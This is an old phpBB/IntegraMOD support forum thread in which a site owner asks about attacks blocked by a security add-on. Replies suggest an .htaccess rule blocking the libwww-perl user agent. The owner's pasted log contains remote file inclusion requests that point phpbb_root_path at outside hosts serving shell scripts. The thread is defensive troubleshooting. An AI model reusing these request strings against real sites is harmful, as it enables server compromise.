IntegraMOD

Home of phpBB Integrated Modifications

Skip to content

CBACK Attacks

Support for IntegraMOD 141

Moderator: Integra Moderator

CBACK Attacks

PostAuthor: BrianC » Tue Feb 05, 2008 4:01 pm

Your phpBB Version: 2.0.
phpBB Type: Standard phpBB
MODs: No
Your knowledge: Beginner
Board URL: [url]http://[/url]

PHP Version:
MySQL Version:


What was done before the problem appeared?



What was done to try to solve the problem?




De.scription and Message

Hi,

I installed a new install of the latest integramod 141 after being hacked badly a few times. CBACK indicates that it has blocked 125 attacks in just a couple of days. What are the attacks that are likely being blocked. Perhaps automated scans or maybe someone attacking the site again.

Any ideas?

Thanks,
Brian
Last edited by BrianC on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.

BrianC
Newbie
Newbie
 
Posts: 23
Likes: 0 post
Liked in: 0 post
Joined: Sat May 13, 2006 11:04 am
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: Helter » Tue Feb 05, 2008 4:20 pm

go to acp/CTracker/Logfile Manager/
Last edited by Helter on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.
"Success is getting what you want. Happiness is wanting what you get." - Dale Carnegie
User avatar
Helter
Administrator
Administrator
 
Posts: 4554
Likes: 40 posts
Liked in: 116 posts
Images: 0
Joined: Sat Mar 11, 2006 4:46 pm
Cash on hand: 1,959.15
Location: Seattle Wa
IntegraMOD version: phpBB2x
Top

Re: CBACK Attacks

PostAuthor: CaNNon » Tue Feb 05, 2008 5:41 pm

Perhaps automated scans

Those show up in phpbb security as ddos attacks

someone attacking the site again.

Yea attacking or trying to get spam in.

1 htaccess rule should cut that a lot. look at what is happing with this user agent libwww-perl if you would like to block add this to your .htaccess file.

Code: Select all
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
Last edited by CaNNon on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 12:15 pm
Cash on hand: 0.00
Top

PostAuthor: spaniel » Tue Feb 05, 2008 10:37 pm

when u do a filescan in Ctracker and it tells you:

Code in the file is possibly executable from beyond phpBB


does that mean those files are unsafe and how can you stop them being executable from beyond phpBB?

And of my admin_security.php file, it said:

An undefined case occurred during scanning


should i be worried?


thanks.
Last edited by spaniel on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.

spaniel
Sr Integra Member
Sr Integra Member
 
Posts: 220
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 26, 2006 4:29 pm
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 12:49 am

No worries the first one you would use like to check if updates have made your forum more secure. Not all files can be coded "not to be possibly executable from beyond phpBB" in cases you need to do this.

The second one just don't worry about I think its more the scan/scan order, that the file.

[tab]Now the other included scanner is much better... as you can create check sums.
So after you work on your site make fresh check sums and if you think you may have had a guest, you can verify if there have been any changes to the code by the check sum. Also it shows you what file you need to go check!

A nice little tool and I have much faith in it.
Last edited by CaNNon on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 12:15 pm
Cash on hand: 0.00
Top

PostAuthor: spaniel » Wed Feb 06, 2008 1:09 am

That sounds ingenius! Wow! It even tells u which file to check.

I'll be doing that from now on - thanks once again CaNNon <img>
Last edited by spaniel on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.

spaniel
Sr Integra Member
Sr Integra Member
 
Posts: 220
Likes: 0 post
Liked in: 0 post
Joined: Wed Apr 26, 2006 4:29 pm
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 8:49 am

No Problem. <img>
Last edited by CaNNon on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 12:15 pm
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: BrianC » Wed Feb 06, 2008 5:54 pm

Thanks for the help!!
This is some of the info in my logfile and I have added the info indicated to my .htaccess
I added it to the htaccess in my root folder because that is where I forum is located.
Does that sound right.
<img>
6 Feb 2008 05:02 pm /group/portal.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? libwww-perl/5.808 65.98.55.154
2 06 Feb 2008 03:53 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? libwww-perl/5.803 89.97.0.11
3 06 Feb 2008 03:16 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt? libwww-perl/5.808 74.53.114.5
4 06 Feb 2008 03:13 pm /group/portal.php?phpbb_root_path=http://www.arabx1st.xpgplus.com.br/cmd.txt?? libwww-perl/5.808 74.53.114.5
5 06 Feb 2008 02:52 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.69 80.128.102.224
6 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt???? libwww-perl/5.803 213.83.63.218
7 06 Feb 2008 02:40 pm /group/portal.php?phpbb_root_path=http://test.iearn.uz/test.iearn.uz/help.txt??? libwww-perl/5.803 62.75.202.173
8 06 Feb 2008 01:44 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10
9 06 Feb 2008 01:41 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.79 66.246.220.39
10 06 Feb 2008 01:32 pm /group/portal.php?page=7&lofi=1//includes/functions_portal.php?phpbb_root_path=http://66.153.86.221/www??????????????????????????????????? libwww-perl/5.805 75.0.18.81
11 06 Feb 2008 01:21 pm /group/portal.php?phpbb_root_path=http://217.126.22.22/.../myss.txt?? libwww-perl/5.805 64.81.203.10
Last edited by BrianC on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.

BrianC
Newbie
Newbie
 
Posts: 23
Likes: 0 post
Liked in: 0 post
Joined: Sat May 13, 2006 11:04 am
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: BrianC » Wed Feb 06, 2008 8:02 pm

Who is in non compliance Spaniel?

I installed the latest integramod and neither added or removed anything accept some header images.
Last edited by BrianC on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.

BrianC
Newbie
Newbie
 
Posts: 23
Likes: 0 post
Liked in: 0 post
Joined: Sat May 13, 2006 11:04 am
Cash on hand: 0.00
Top

Re: CBACK Attacks

PostAuthor: CaNNon » Wed Feb 06, 2008 10:48 pm

Yea the worst I've had is 600 hits from libwww-perl in one night Brian. I have yet to See it do anything but attack. Best to save the resources and just ban it. <img>
Last edited by CaNNon on Wed Dec 31, 1969 5:00 pm, edited 1 time in total.
Image
Image
User avatar
CaNNon
Sr Integra Member
Sr Integra Member
 
Posts: 750
Likes: 0 post
Liked in: 0 post
Joined: Thu Apr 19, 2007 12:15 pm
Cash on hand: 0.00
Top
Return to IntegraMOD 141

Who is online

Registered users: App360MonitorBot, Bing [Bot], Google [Bot]

  • All times are UTC - 8 hours [ DST ]
It is currently Sat May 10, 2025 4:03 pm

IntegraMOD® is Powered by phpBB® Forum Software © phpBB Group
Support Ukraine
support Ukraine